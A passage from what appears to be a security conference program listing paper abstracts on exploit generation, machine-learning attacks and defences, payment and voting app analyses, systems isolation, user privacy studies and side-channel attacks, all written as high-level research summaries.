We deployed DELF in three distinct OSNs, showing the feasibility of our approach. DELF detected, surfaced, and helped developers correct thousands of omissions and dozens of mistakes, while also enabling timely recovery in tens of incidents where user data was inadvertently deleted.

Software Security

Datalog Disassembly

Disassembly is fundamental to binary analysis and rewriting. We present a novel disassembly technique that takes a stripped binary and produces reassembleable assembly code. The resulting assembly code has accurate symbolic information, providing cross-references for analysis and to enable adjustment of code and data pointers to accommodate rewriting. Our technique features multiple static analyses and heuristics in a combined Datalog implementation. We argue that Datalog’s inference process is particularly well suited for disassembly and the required analyses. Our implementation and experiments support this claim. We have implemented our approach into an open-source tool called Ddisasm. In extensive experiments in which we rewrite thousands of x64 binaries we find Ddisasm is both faster and more accurate than the current state-of-the-art binary reassembling tool, Ramblr.

KOOBE: Towards Facilitating Exploit Generation of Kernel Out-Of-Bounds Write Vulnerabilities

The monolithic nature of modern OS kernels leads to a constant stream of bugs being discovered. It is often unclear which of these bugs are worth fixing, as only a subset of them may be serious enough to lead to security takeovers (i.e., privilege escalations). Therefore, researchers have recently started to develop automated exploit generation techniques (for UAF bugs) to assist the bug triage process. In this paper, we investigate another top memory vulnerability in Linux kernel—out-of-bounds (OOB) memory write from heap. We design KOOBE to assist the analysis of such vulnerabilities based on two observations: (1) Surprisingly often, different OOB vulnerability instances exhibit a wide range of capabilities. (2) Kernel exploits are multi-interaction> in nature (i.e., multiple syscalls are involved in an exploit) which allows the exploit crafting process to be modular. Specifically, we focus on the extraction of capabilities of an OOB vulnerability which will feed the subsequent exploitability evaluation process. Our system builds on several building blocks, including a novel capability-guided fuzzing solution to uncover hidden capabilities, and a way to compose capabilities together to further enhance the likelihood of successful exploitations. In our evaluation, we demonstrate the applicability of KOOBE by exhaustively analyzing 17 most recent Linux kernel OOB vulnerabilities (where only 5 of them have publicly available exploits), for which KOOBE successfully generated candidate exploit strategies for 11 of them (including 5 that do not even have any CVEs assigned). Subsequently from these strategies, we are able to construct fully working exploits for all of them.

Automatic Techniques to Systematically Discover New Heap Exploitation Primitives

Exploitation techniques to abuse metadata of heap allocators have been widely studied because of their generality (i.e., application independence) and powerfulness (i.e., bypassing modern mitigation). However, such techniques are commonly considered arts, and thus the ways to discover them remain ad-hoc, manual, and allocator-specific.

In this paper, we present an automatic tool, ArcHeap, to systematically discover the unexplored heap exploitation primitives, regardless of their underlying implementations. The key idea of ArcHeap is to let the computer autonomously explore the spaces, similar in concept to fuzzing, by specifying a set of common designs of modern heap allocators and root causes of vulnerabilities as models, and by providing heap operations and attack capabilities as actions. During the exploration, ArcHeap checks whether the combinations of these actions can be potentially used to construct exploitation primitives, such as arbitrary write or overlapped chunks. As a proof, ArcHeap generates working PoC that demonstrates the discovered exploitation technique.

We evaluated ArcHeap with ptmalloc2 and 10 other allocators, and discovered five previously unknown exploitation techniques in ptmalloc2 as well as several techniques against seven out of 10 allocators including the security-focused allocator, DieHarder. To show the effectiveness of ArcHeap’s approach in other domains, we also studied how security features and exploit primitives evolve across different versions of ptmalloc2.

The Industrial Age of Hacking

There is a cognitive bias in the hacker community to select a piece of software and invest significant human resources into finding bugs in that software without any prior indication of success. We label this strategy depth-first search and propose an alternative: breadth-first search. In breadth-first search, humans perform minimal work to enable automated analysis on a range of targets before committing additional time and effort to research any particular one.

We present a repeatable human study that leverages teams of varying skill while using automation to the greatest extent possible. Our goal is a process that is effective at finding bugs; has a clear plan for the growth, coaching,and efficient use of team members; and supports measurable, incremental progress. We derive an assembly-line process that improves on what was once intricate, manual work. Our work provides evidence that the breadth-first approach increases the effectiveness of teams.

BScout: Direct Whole Patch Presence Test for Java Executables

To protect end-users and software from known vulnerabilities, it is crucial to apply security patches to affected executables timely. To this end, patch presence tests are proposed with the capability of independently investigating patch application status on a target without source code. Existing work on patch presence testing adopts a signature-based approach. To make a trade-off between the uniqueness and the stability of the signature, existing work is limited to use a small and localized patch snippet (instead of the whole patch) for signature generation, so they are inherently unreliable.

In light of this, we present BScout, which directly checks the presence of a whole patch in Java executables without generating signatures. BScout features several new techniques to bridge the semantic gap between source code and bytecode instructions during the testing, and accurately checks the fine-grained patch semantics in the whole target executable. We evaluate BScout with 194 CVEs from the Android framework and third-party libraries. The results show that it achieves remarkable accuracy with and without line number information (i.e., debug information) presented in a target executable. We further apply BScout to perform a large-scale patch application practice study with 2,506 Android system images from 7 vendors. Our study reveals many findings that have not yet been reported.

MVP: Detecting Vulnerabilities using Patch-Enhanced Vulnerability Signatures

Recurring vulnerabilities widely exist and remain undetected in real-world systems, which are often resulted from reused code base or shared code logic. However, the potentially small differences between vulnerable functions and their patched functions as well as the possibly large differences between vulnerable functions and target functions to be detected bring challenges to clone-based and function matching-based approaches to identify these recurring vulnerabilities, i.e., causing high false positives and false negatives.

In this paper, we propose a novel approach to detect recurring vulnerabilities with low false positives and low false negatives. We first use our novel program slicing to extract vulnerability and patch signatures from vulnerable function and its patched function at syntactic and semantic levels. Then a target function is identified as potentially vulnerable if it matches the vulnerability signature but does not match the patch signature. We implement our approach in a tool named MVP. Our evaluation on ten open-source systems has shown that, i) MVP significantly outperformed state-of-the-art clone-based and function matching-based recurring vulnerability detection approaches; ii) MVP detected recurring vulnerabilities that cannot be detected by general-purpose vulnerability detection approaches, i.e., two learning-based approaches and two commercial tools; and iii) MVP has detected 97 new vulnerabilities with 23 CVE identifiers assigned.

Machine Learning 1

Updates-Leak: Data Set Inference and Reconstruction Attacks in Online Learning

Machine learning (ML) has progressed rapidly during the past decade and the major factor that drives such development is the unprecedented large-scale data. As data generation is a continuous process, this leads to ML model owners updating their models frequently with newly-collected data in an online learning scenario. In consequence, if an ML model is queried with the same set of data samples at two different points in time, it will provide different results.

In this paper, we investigate whether the change in the output of a black-box ML model before and after being updated can leak information of the dataset used to perform the update, namely the updating set. This constitutes a new attack surface against black-box ML models and such information leakage may compromise the intellectual property and data privacy of the ML model owner. We propose four attacks following an encoder-decoder formulation, which allows inferring diverse information of the updating set. Our new attacks are facilitated by state-of-the-art deep learning techniques. In particular, we propose a hybrid generative model (CBM-GAN) that is based on generative adversarial networks (GANs) but includes a reconstructive loss that allows reconstructing accurate samples. Our experiments show that the proposed attacks achieve strong performance.

Exploring Connections Between Active Learning and Model Extraction

Machine learning is being increasingly used by individuals, research institutions, and corporations. This has resulted in the surge of Machine Learning-as-a-Service (MLaaS) - cloud services that provide (a) tools and resources to learn the model, and (b) a user-friendly query interface to access the model. However, such MLaaS systems raise privacy concerns such as model extraction. In model extraction attacks, adversaries maliciously exploit the query interface to steal the model. More precisely, in a model extraction attack, a good approximation of a sensitive or proprietary model held by the server is extracted (i.e. learned) by a dishonest user who interacts with the server only via the query interface. This attack was introduced by Tramèr et. al. at the 2016 USENIX Security Symposium, where practical attacks for various models were shown. We believe that better understanding the efficacy of model extraction attacks is paramount to designing secure MLaaS systems. To that end, we take the first step by (a) formalizing model extraction and discussing possible defense strategies, and (b) drawing parallels between model extraction and established area of active learning. In particular, we show that recent advancements in the active learning domain can be used to implement powerful model extraction attacks and investigate possible defense strategies.

Hybrid Batch Attacks: Finding Black-box Adversarial Examples with Limited Queries

We study adversarial examples in a black-box setting where the adversary only has API access to the target model and each query is expensive. Prior work on black-box adversarial examples follows one of two main strategies: (1) transfer attacks use white-box attacks on local models to find candidate adversarial examples that transfer to the target model, and (2) optimization-based attacks use queries to the target model and apply optimization techniques to search for adversarial examples. We propose hybrid attacks that combine both strategies, using candidate adversarial examples from local models as starting points for optimization-based attacks and using labels learned in optimization-based attacks to tune local models for finding transfer candidates. We empirically demonstrate on the MNIST, CIFAR10, and ImageNet datasets that our hybrid attack strategy reduces cost and improves success rates. We also introduce a seed prioritization strategy which enables attackers to focus their resources on the most promising seeds. Combining hybrid attacks with our seed prioritization strategy enables batch attacks that can reliably find adversarial examples with only a handful of queries.

High Accuracy and High Fidelity Extraction of Neural Networks

In a model extraction attack, an adversary steals a copy of a remotely deployed machine learning model, given oracle prediction access. We taxonomize model extraction attacks around two objectives: accuracy, i.e., performing well on the underlying learning task, and fidelity, i.e., matching the predictions of the remote victim classifier on any input.

To extract a high-accuracy model, we develop a learning-based attack exploiting the victim to supervise the training of an extracted model. Through analytical and empirical arguments, we then explain the inherent limitations that prevent any learning-based strategy from extracting a truly high-fidelity model—i.e., extracting a functionally-equivalent model whose predictions are identical to those of the victim model on all possible inputs. Addressing these limitations, we expand on prior work to develop the first practical functionally-equivalent extraction attack for direct extraction (i.e., without training) of a model’s weights.

We perform experiments both on academic datasets and a state-of-the-art image classifier trained with 1 billion proprietary images. In addition to broadening the scope of model extraction research, our work demonstrates the practicality of model extraction attacks against production-grade systems.

Adversarial Preprocessing: Understanding and Preventing Image-Scaling Attacks in Machine Learning

Machine learning has made remarkable progress in the last years, yet its success has been overshadowed by different attacks that can thwart its correct operation. While a large body of research has studied attacks against learning algorithms, vulnerabilities in the preprocessing for machine learning have received little attention so far. An exception is the recent work of Xiao et al. that proposes attacks against image scaling. In contrast to prior work, these attacks are agnostic to the learning algorithm and thus impact the majority of learning-based approaches in computer vision. The mechanisms underlying the attacks, however, are not understood yet, and hence their root cause remains unknown.

In this paper, we provide the first in-depth analysis of image-scaling attacks. We theoretically analyze the attacks from the perspective of signal processing and identify their root cause as the interplay of downsampling and convolution. Based on this finding, we investigate three popular imaging libraries for machine learning (OpenCV, TensorFlow, and Pillow) and confirm the presence of this interplay in different scaling algorithms. As a remedy, we develop a novel defense against image-scaling attacks that prevents all possible attack variants. We empirically demonstrate the efficacy of this defense against non-adaptive and adaptive adversaries.

TextShield: Robust Text Classification Based on Multimodal Embedding and Neural Machine Translation

Text-based toxic content detection is an important tool for reducing harmful interactions in online social media environments. Yet, its underlying mechanism, deep learning-based text classification (DLTC), is inherently vulnerable to maliciously crafted adversarial texts. To mitigate such vulnerabilities, intensive research has been conducted on strengthening English-based DLTC models. However, the existing defenses are not effective for Chinese-based DLTC models, due to the unique sparseness, diversity, and variation of the Chinese language.

In this paper, we bridge this striking gap by presenting TextShield, a new adversarial defense framework specifically designed for Chinese-based DLTC models. TextShield differs from previous work in several key aspects: (i) generic – it applies to any Chinese-based DLTC models without requiring re-training; (ii) robust – it significantly reduces the attack success rate even under the setting of adaptive attacks; and (iii) accurate – it has little impact on the performance of DLTC models over legitimate inputs. Extensive evaluations show that it outperforms both existing methods and the industry-leading platforms. Future work will explore its applicability in broader practical tasks.

Financial Tech and Voting

Security Analysis of Unified Payments Interface and Payment Apps in India

Since 2016, with a strong push from the Government of India, smartphone-based payment apps have become mainstream, with over $50 billion transacted through these apps in 2018. Many of these apps use a common infrastructure introduced by the Indian government, called the Unified Payments Interface (UPI), but there has been no security analysis of this critical piece of infrastructure that supports money transfers. This paper uses a principled methodology to do a detailed security analysis of the UPI protocol by reverse-engineering the design of this protocol through seven popular UPI apps. We discover previously-unreported multi-factor authentication design-level flaws in the UPI 1.0 specification that can lead to significant attacks when combined with an installed attacker-controlled application. In an extreme version of the attack, the flaws could allow a victim’s bank account to be linked and emptied, even if a victim had never used a UPI app. The potential attacks were scalable and could be done remotely. We discuss our methodology and detail how we overcame challenges in reverse-engineering this unpublished application layer protocol, including that all UPI apps undergo a rigorous security review in India and are designed to resist analysis. The work resulted in several CVEs, and a key attack vector that we reported was later addressed in UPI 2.0.

Cardpliance: PCI DSS Compliance of Android Applications

Smartphones and their applications have become a predominant way of computing, and it is only natural that they have become an important part of financial transaction technology. However, applications asking users to enter credit card numbers have been largely overlooked by prior studies, which frequently report pervasive security and privacy concerns in the general mobile application ecosystem. Such applications are particularly security-sensitive, and they are subject to the Payment Card Industry Data Security Standard (PCI DSS). In this paper, we design a tool called Cardpliance, which bridges the semantics of the graphical user interface with static program analysis to capture relevant requirements from PCI DSS. We use Cardpliance to study 358 popular applications from Google Play that ask the user to enter a credit card number. Overall, we found that 1.67% of the 358 applications are not compliant with PCI DSS, with vulnerabilities including improperly storing credit card numbers and card verification codes. These findings paint a largely positive picture of the state of PCI DSS compliance of popular Android applications.

The Ballot is Busted Before the Blockchain: A Security Analysis of Voatz, the First Internet Voting Application Used in U.S. Federal Elections

In the 2018 midterm elections, West Virginia became the first state in the U.S. to allow select voters to cast their ballot on a mobile phone via a proprietary app called “Voatz.” Although there is no public formal description of Voatz’s security model, the company claims that election security and integrity are maintained through the use of a permissioned blockchain, biometrics, a mixnet, and hardware-backed key storage modules on the user’s device. In this work, we present the first public security analysis of Voatz, based on a reverse engineering of their Android application and the minimal available documentation of the system. We performed a cleanroom reimplementation of Voatz’s server and present an analysis of the election process as visible from the app itself.

We find that Voatz has vulnerabilities that allow different kinds of adversaries to alter, stop, or expose a user’s vote, including a sidechannel attack in which a completely passive network adversary can potentially recover a user’s secret ballot. We additionally find that Voatz has a number of privacy issues stemming from their use of third party services for crucial app functionality. Our findings serve as a concrete illustration of the common wisdom against Internet voting, and of the importance of transparency to the legitimacy of elections. As a result of our work, West Virginia and one county in Washington has already aborted their use of Voatz in the 2020 primaries.

VoteAgain: A scalable coercion-resistant voting system

The strongest threat model for voting systems considers coercion resistance: protection against coercers that force voters to modify their votes, or to abstain. Existing remote voting systems either do not provide this property; require expensive operations for tallying; or burden users with the need to store cryptographic key material and with the responsibility to deceive their coercers. We propose VoteAgain, a scalable voting scheme that relies on the revoting paradigm to provide coercion resistance. VoteAgain uses a novel deterministic ballot padding mechanism to ensure that coercers cannot see whether a vote has been replaced. This mechanism ensures tallying takes quasilinear time, making VoteAgain the first revoting scheme that can handle elections with millions of voters. We prove that VoteAgain provides ballot privacy, coercion resistance, and verifiability; and we demonstrate its scalability using a prototype implementation of its core cryptographic primitives.

Boxer: Preventing fraud by scanning credit cards

Card-not-present credit card fraud costs businesses billions of dollars a year. In this paper, we present Boxer, a mobile SDK and server that enables apps to combat card-not-present fraud by scanning cards and verifying that they are genuine. Boxer analyzes the images from these scans, looking for tell-tale signs of attacks, and introduces a novel abstraction on top of modern security hardware for complementary protection.

Currently, 323 apps have integrated Boxer, and tens of them have deployed it to production, including some large, popular, and international apps, resulting in Boxer scanning over 10 million real cards already. Our evaluation of Boxer from one of these deployments shows ten cases of real attacks that our novel hardware-based abstraction detects. Additionally, from the same deployment, without letting in any fraud, Boxer’s card scanning recovers 89% of the good users whom the app would have blocked. In another evaluation of Boxer, we run our image analysis models against images from real users and show an accuracy of 96% and 100% on the two models that we use.

Machine Learning 2

Fawkes: Protecting Privacy against Unauthorized Deep Learning Models

Today’s proliferation of powerful facial recognition systems poses a real threat to personal privacy. As Clearview.ai demonstrated, anyone can canvas the Internet for data and train highly accurate facial recognition models of individuals without their knowledge. We need tools to protect ourselves from potential misuses of unauthorized facial recognition systems. Unfortunately, no practical or effective solutions exist.

In this paper, we propose Fawkes, a system that helps individuals inoculate their images against unauthorized facial recognition models. Fawkes achieves this by helping users add imperceptible pixel-level changes (we call them “cloaks”) to their own photos before releasing them. When used to train facial recognition models, these “cloaked” images produce functional models that consistently cause normal images of the user to be misidentified. We experimentally demonstrate that Fawkes provides 95+% protection against user recognition regardless of how trackers train their models. Even when clean, uncloaked images are “leaked” to the tracker and used for training, Fawkes can still maintain an 80+% protection success rate. We achieve 100% success in experiments against today’s state-of-the-art facial recognition services. Finally, we show that Fawkes is robust against a variety of countermeasures that try to detect or disrupt image cloaks.

Stolen Memories: Leveraging Model Memorization for Calibrated White-Box Membership Inference

Membership inference (MI) attacks exploit the fact that machine learning algorithms sometimes leak information about their training data through the learned model. In this work, we study membership inference in the white-box setting in order to exploit the internals of a model, which have not been effectively utilized by previous work. Leveraging new insights about how overfitting occurs in deep neural networks, we show how a model’s idiosyncratic use of features can provide evidence for membership to white-box attackers—even when the model’s black-box behavior appears to generalize well—and demonstrate that this attack outperforms prior black-box methods. Taking the position that an effective attack should have the ability to provide confident positive inferences, we find that previous attacks do not often provide a meaningful basis for confidently inferring membership, whereas our attack can be effectively calibrated for high precision. Finally, we examine popular defenses against MI attacks, finding that (1) smaller generalization error is not sufficient to prevent attacks on real models, and (2) while small-ϵ-differential privacy reduces the attack’s effectiveness, this often comes at a significant cost to the model’s accuracy; and for larger ϵ that are sometimes used in practice (e.g., ϵ=16), the attack can achieve nearly the same accuracy as on the unprotected model.

Local Model Poisoning Attacks to Byzantine-Robust Federated Learning

In federated learning, multiple client devices jointly learn a machine learning model: each client device maintains a local model for its local training dataset, while a master device maintains a global model via aggregating the local models from the client devices. The machine learning community recently proposed several federated learning methods that were claimed to be robust against Byzantine failures (e.g., system failures, adversarial manipulations) of certain client devices. In this work, we perform the first systematic study on local model poisoning attacks to federated learning. We assume an attacker has compromised some client devices, and the attacker manipulates the local model parameters on the compromised client devices during the learning process such that the global model has a large testing error rate. We formulate our attacks as optimization problems and apply our attacks to four recent Byzantine-robust federated learning methods. Our empirical results on four real-world datasets show that our attacks can substantially increase the error rates of the models learnt by the federated learning methods that were claimed to be robust against Byzantine failures of some client devices. We generalize two defenses for data poisoning attacks to defend against our local model poisoning attacks. Our evaluation results show that one defense can effectively defend against our attacks in some cases, but the defenses are not effective enough in other cases, highlighting the need for new defenses against our local model poisoning attacks to federated learning.

Justinian’s GAAvernor: Robust Distributed Learning with Gradient Aggregation Agent

The hidden vulnerability of distributed learning systems against Byzantine attacks has been investigated by recent researches and, fortunately, some known defenses showed the ability to mitigate Byzantine attacks when a minority of workers are under adversarial control. Yet, our community still has very little knowledge on how to handle the situations when the proportion of malicious workers is 50% or more. Based on our preliminary study of this open challenge, we find there is more that can be done to restore Byzantine robustness in these more threatening situations, if we better utilize the auxiliary information inside the learning process.

In this paper, we propose Justinian’s GAAvernor (GAA), a Gradient Aggregation Agent which learns to be robust against Byzantine attacks via reinforcement learning techniques. Basically, GAA relies on utilizing the historical interactions with the workers as experience and a quasi-validation set, a small dataset that consists of less than $10$ data samples from similar data domains, to generate reward signals for policy learning. As a complement to existing defenses, our proposed approach does not bound the expected number of malicious workers and is proved to be robust in more challenging scenarios.

Through extensive evaluations on four benchmark systems and against various adversarial settings, our proposed defense shows desirable robustness as if the systems were under no attacks, even in some case when 90% Byzantine workers are controlled by the adversary. Meanwhile, our approach shows a similar level of time efficiency compared with the state-of-the-art defenses. Moreover, GAA provides highly interpretable traces of worker behavior as by-products for further mitigation usages like Byzantine worker detection and behavior pattern analysis.

Interpretable Deep Learning under Fire

Providing explanations for deep neural network (DNN) models is crucial for their use in security-sensitive domains. A plethora of interpretation models have been proposed to help users understand the inner workings of DNNs: how does a DNN arrive at a specific decision for a given input? The improved interpretability is believed to offer a sense of security by involving human in the decision-making process. Yet, due to its data-driven nature, the interpretability itself is potentially susceptible to malicious manipulations, about which little is known thus far.

Here we bridge this gap by conducting the first systematic study on the security of interpretable deep learning systems (IDLSes). We show that existing IDLSes are highly vulnerable to adversarial manipulations. Specifically, we present ADV2, a new class of attacks that generate adversarial inputs not only misleading target DNNs but also deceiving their coupled interpretation models. Through empirical evaluation against four major types of IDLSes on benchmark datasets and in security-critical applications (e.g., skin cancer diagnosis), we demonstrate that with ADV2 the adversary is able to arbitrarily designate an input’s prediction and interpretation. Further, with both analytical and empirical evidence, we identify the prediction-interpretation gap as one root cause of this vulnerability – a DNN and its interpretation model are often misaligned, resulting in the possibility of exploiting both models simultaneously. Finally, we explore potential countermeasures against ADV2, including leveraging its low transferability and incorporating it in an adversarial training framework. Our findings shed light on designing and operating IDLSes in a more secure and informative fashion, leading to several promising research directions.

Systems Security

Donky: Domain Keys - Efficient In-Process Isolation for RISC-V and x86

Efficient and secure in-process isolation is in great demand, as evidenced in the shift towards JavaScript and the recent revival of memory protection keys. Yet, state-of-the-art systems do not offer strong security or struggle with frequent domain crossings and oftentimes intrusive kernel modifications. We propose Donky, an efficient hardware-software co-design for strong in-process isolation based on dynamic memory protection domains. The two components of our design are a secure software framework and a non-intrusive hardware extension. We facilitate domain switches entirely in userspace, thus minimizing switching overhead as well as kernel complexity. We show the versatility of Donky in three realistic use cases, secure V8 sandboxing, software vaults, and untrusted third-party libraries. We provide an open-source implementation on a RISC-V Ariane CPU and an Intel-MPK-based emulation mode for x86. We evaluate the security and performance of our implementation for RISC-V synthesized on an FPGA. We also evaluate the performance on x86 and show why our new design is more secure than Intel MPK. Donky does not impede the runtime of in-domain computation. Cross-domain switches are 16–116x faster than regular process context switches. Fully protecting the mbedTLS cryptographic operations has a 4 % overhead.

(Mostly) Exitless VM Protection from Untrusted Hypervisor through Disaggregated Nested Virtualization

Today’s cloud tenants are facing severe security threats such as compromised hypervisors, which forces a strong adversary model where the hypervisor should be excluded out of the TCB. Previous approaches to shielding guest VMs either suffer from insufficient protection or result in suboptimal performance due to frequent VM exits (especially for I/O operations). This paper presents CloudVisor-D, an efficient nested hypervisor design that embraces both strong protection and high performance. The core idea of CloudVisor-D is to disaggregate the nested hypervisor by separating major protection logics into a protected Guardian-VM alongside each guest VM. The Guardian-VM is securely isolated and protected by the nested hypervisor and provides secure services for most privileged operations like hypercalls, EPT violations and I/O operations from guest VMs. By leveraging recent hardware features, most privileged operations from a guest VM require no VM exits to the nested hypervisor, which are the major sources of performance slowdown in prior designs. We have implemented CloudVisor-D on a commercially available machine with these recent hardware features. Experimental evaluation shows that CloudVisor-D incurs negligible performance overhead even for I/O intensive benchmarks and in some cases outperforms a vanilla hypervisor due to the reduced number of VM exits.

DECAF: Automatic, Adaptive De-bloating and Hardening of COTS Firmware

Once compromised, server firmware can surreptitiously and permanently take over a machine and any stack running thereon, with no hope for recovery, short of hardware-level intervention. To make things worse, modern firmware contains millions of lines of unnecessary code and hundreds of unnecessary modules as a result of a long firmware supply chain designed to optimize time-to-market and cost, but not security. As a result, off-the-shelf motherboards contain large, unnecessarily complex, closed-source vulnerability surfaces that can completely and irreversibly compromise systems.

In this work, we address this problem by dramatically and automatically reducing the vulnerability surface. DECAF is an extensible platform for automatically pruning a wide class of commercial UEFI firmware. DECAF intelligently runs dynamic iterative surgery on UEFI firmware to remove a maximal amount of code with no regressive effects on the functionality and performance of higher layers in the stack (OS, applications).

DECAF has successfully pruned over 70% of unnecessary, redundant, reachable firmware in leading server-grade motherboards with no effect on the upper layers, and increased resulting system performance and boot times.

McTiny: Fast High-Confidence Post-Quantum Key Erasure for Tiny Network Servers

Recent results have shown that some post-quantum cryptographic systems have encryption and decryption performance comparable to fast elliptic-curve cryptography (ECC) or even better. However, this performance metric is considering only CPU time and ignoring bandwidth and storage. High-confidence post-quantum encryption systems have much larger keys than ECC. For example, the code-based cryptosystem recommended by the PQCRYPTO project uses public keys of 1MB.

Fast key erasure (to provide “forward secrecy”) requires new public keys to be constantly transmitted. Either the server needs to constantly generate, store, and transmit large keys, or it needs to receive, store, and use large keys from the clients. This is not necessarily a problem for overall bandwidth, but it is a problem for storage and computation time on tiny network servers. All straightforward approaches allow easy denial-of-service attacks.

This paper describes a protocol, suitable for today’s networks and tiny servers, in which clients transmit their code-based one-time public keys to servers. Servers never store full client public keys but work on parts provided by the clients, without having to maintain any per-client state. Intermediate results are stored on the client side in the form of encrypted cookies and are eventually combined by the server to obtain the ciphertext. Requirements on the server side are very small: storage of one long-term private key, which is much smaller than a public key, and a few small symmetric cookie keys, which are updated regularly and erased after use. The protocol is highly parallel, requiring only a few round trips, and involves total bandwidth not much larger than a single public key. The total number of packets sent by each side is 971, each fitting into one IPv6 packet of less than 1280 bytes.

The protocol makes use of the structure of encryption in code-based cryptography and benefits from small ciphertexts in code-based cryptography.

Temporal System Call Specialization for Attack Surface Reduction

Attack surface reduction through the removal of unnecessary application features and code is a promising technique for improving security without incurring any additional overhead. Recent software debloating techniques consider an application’s entire lifetime when extracting its code requirements, and reduce the attack surface accordingly.

In this paper, we present temporal specialization, a novel approach for limiting the set of system calls available to a process depending on its phase of execution. Our approach is tailored to server applications, which exhibit distinct initialization and serving phases with different system call requirements. We present novel static analysis techniques for improving the precision of extracting the application’s call graph for each execution phase, which is then used to pinpoint the system calls used in each phase. We show that requirements change throughout the lifetime of servers, and many dangerous system calls (such as execve) can be disabled after the completion of the initialization phase. We have implemented a prototype of temporal specialization on top of the LLVM compiler, and evaluated its effectiveness with six popular server applications. Our results show that it disables 51% more security-critical system calls compared to existing library specialization approaches, while offering the additional benefit of neutralizing 13 more Linux kernel vulnerabilities that could lead to privilege escalation.

Specific User Populations

An Observational Investigation of Reverse Engineers’ Processes

Reverse engineering is a complex process essential to software-security tasks such as vulnerability discovery and malware analysis. Significant research and engineering effort has gone into developing tools to support reverse engineers. However, little work has been done to understand the way reverse engineers think when analyzing programs, leaving tool developers to make interface design decisions based only on intuition.

This paper takes a first step toward a better understanding of reverse engineers’ processes, with the goal of producing insights for improving interaction design for reverse engineering tools. We present the results of a semi-structured, observational interview study of reverse engineers (N=16). Each observation investigated the questions reverse engineers ask as they probe a program, how they answer these questions, and the decisions they make throughout the reverse engineering process. From the interview responses, we distill a model of the reverse engineering process, divided into three phases: overview, sub-component scanning, and focused experimentation. Each analysis phase’s results feed the next as reverse engineers’ mental representations become more concrete. We find that reverse engineers typically use static methods in the first two phases, but dynamic methods in the final phase, with experience playing large, but varying, roles in each phase. Based on these results, we provide five interaction design guidelines for reverse engineering tools.

The Tools and Tactics Used in Intimate Partner Surveillance: An Analysis of Online Infidelity Forums

Abusers increasingly use spyware apps, account compromise, and social engineering to surveil their intimate partners, causing substantial harms that can culminate in violence. This form of privacy violation, termed intimate partner surveillance (IPS), is a profoundly challenging problem to address due to the physical access and trust present in the relationship between the target and attacker. While previous research has examined IPS from the perspectives of survivors, we present the first measurement study of online forums in which (potential) attackers discuss IPS strategies and techniques. In domains such as cybercrime, child abuse, and human trafficking, studying the online behaviors of perpetrators has led to better threat intelligence and techniques to combat attacks. We aim to provide similar insights in the context of IPS. We identified five online forums containing discussion of monitoring cellphones and other means of surveilling an intimate partner, including three within the context of investigating relationship infidelity. We perform a mixed-methods analysis of these forums, surfacing the tools and tactics that attackers use to perform surveillance. Via qualitative analysis of forum content, we present a taxonomy of IPS strategies used and recommended by attackers, and synthesize lessons for technologists seeking to curb the spread of IPS.

DatashareNetwork: A Decentralized Privacy-Preserving Search Engine for Investigative Journalists

Investigative journalists collect large numbers of digital documents during their investigations. These documents can greatly benefit other journalists’ work. However, many of these documents contain sensitive information. Hence, possessing such documents can endanger reporters, their stories, and their sources. Consequently, many documents are used only for single, local, investigations. We present DatashareNetwork, a decentralized and privacy-preserving search system that enables journalists worldwide to find documents via a dedicated network of peers. DatashareNetwork combines well-known anonymous authentication mechanisms and anonymous communication primitives, a novel asynchronous messaging system, and a novel multi-set private set intersection protocol (MS-PSI) into a decentralized peer-to-peer private document search engine. Using a prototype implementation, we show that DatashareNetwork is secure and scales to thousands of users and millions of documents.

“I am uncomfortable sharing what I can’t see”: Privacy Concerns of the Visually Impaired with Camera Based Assistive Applications

The emergence of camera-based assistive technologies has empowered people with visual impairments (VIP) to obtain independence in their daily lives. Popular services feature volunteers who answer questions about photos or videos (e.g., to identify a medical prescription). However, people with VIPs can (inadvertently) reveal sensitive information to these volunteers. To better understand the privacy concerns regarding the disclosure of background objects to different types of human assistants (friends, family, and others), we conducted an online survey with 155 visually impaired participants. In general, our participants had varying concerns depending on the type of assistants and the kind of information. We found that our participants were more concerned about the privacy of bystanders than their own when capturing people in images. We also found that participants were concerned about self-presentation and were more comfortable sharing embarrassing information with family than with their friends. Our findings suggest directions for future work in the development of human-assisted question-answering systems. Specifically, we discuss how humanizing these systems can give people a greater sense of personal security.

‘I have too much respect for my elders’: Understanding South African Mobile Users’ Perceptions of Privacy and Current Behaviors on Facebook and WhatsApp

Facebook usage is growing in developing countries, but we know little about how to tailor social media privacy settings to users in resourced-constrained settings. To that end, we present findings from interviews of 52 current mobile social media users in South Africa. We found users’ primary privacy-related concern was who else could see their posts and messages, not what data the platforms or advertisers collect about them. Second, users displayed general knowledge gaps on existing social media privacy settings and relied heavily on blocking and passwords for privacy protection. Third, users’ privacy and security-related behaviors were heavily influenced by living in high-crime areas. Based on these findings, we make recommendations for future work to better serve user privacy and security needs in resourced-constrained settings.

Side Channel Attacks

RELOAD+REFRESH: Abusing Cache Replacement Policies to Perform Stealthy Cache Attacks

Caches have become the prime method for unintended information extraction across logical isolation boundaries. They are widely available on all major CPU platforms and, as a side channel, caches provide great resolution, making them the most convenient channel for Spectre and Meltdown. As a consequence, several methods to stop cache attacks by detecting them have been proposed. Detection is strongly aided by the fact that observing cache activity of co-resident processes is not possible without altering the cache state and thereby forcing evictions on the observed processes. In this work we show that this widely held assumption is incorrect. Through clever usage of the cache replacement policy, it is possible to track cache accesses of a victim’s process without forcing evictions on the victim’s data. Hence, online detection mechanisms that rely on these evictions can be circumvented as they would not detect the introduced RELOAD+REFRESH attack. The attack requires a profound understanding of the cache replacement policy. We present a methodology to recover the replacement policy and apply it to the last five generations of Intel processors. We further show empirically that the performance of RELOAD+REFRESH on cryptographic implementations is comparable to that of other widely used cache attacks, while detection methods that rely on L3 cache events are successfully thwarted.

Timeless Timing Attacks: Exploiting Concurrency to Leak Secrets over Remote Connections

To perform successful remote timing attacks, an adversary typically collects a series of network timing measurements and subsequently performs statistical analysis to reveal a difference in execution time. The number of measurements that must be obtained largely depends on the amount of jitter that the requests and responses are subjected to. In remote timing attacks, a significant source of jitter is the network path between the adversary and the targeted server, making it practically infeasible to successfully exploit timing side-channels that exhibit only a small difference in execution time.

In this paper, we introduce a conceptually novel type of timing attack that leverages the coalescing of packets by network protocols and concurrent handling of requests by applications. These concurrency-based timing attacks infer a relative timing difference by analyzing the order in which responses are returned, and thus do not rely on any absolute timing information. We show how these attacks result in a 100-fold improvement over typical timing attacks performed over the Internet, and can accurately detect timing differences as small as 100ns, similar to attacks launched on a local system. We describe how these timing attacks can be successfully deployed against HTTP/2 webservers, Tor onion services, and EAP-pwd, a popular Wi-Fi authentication method.

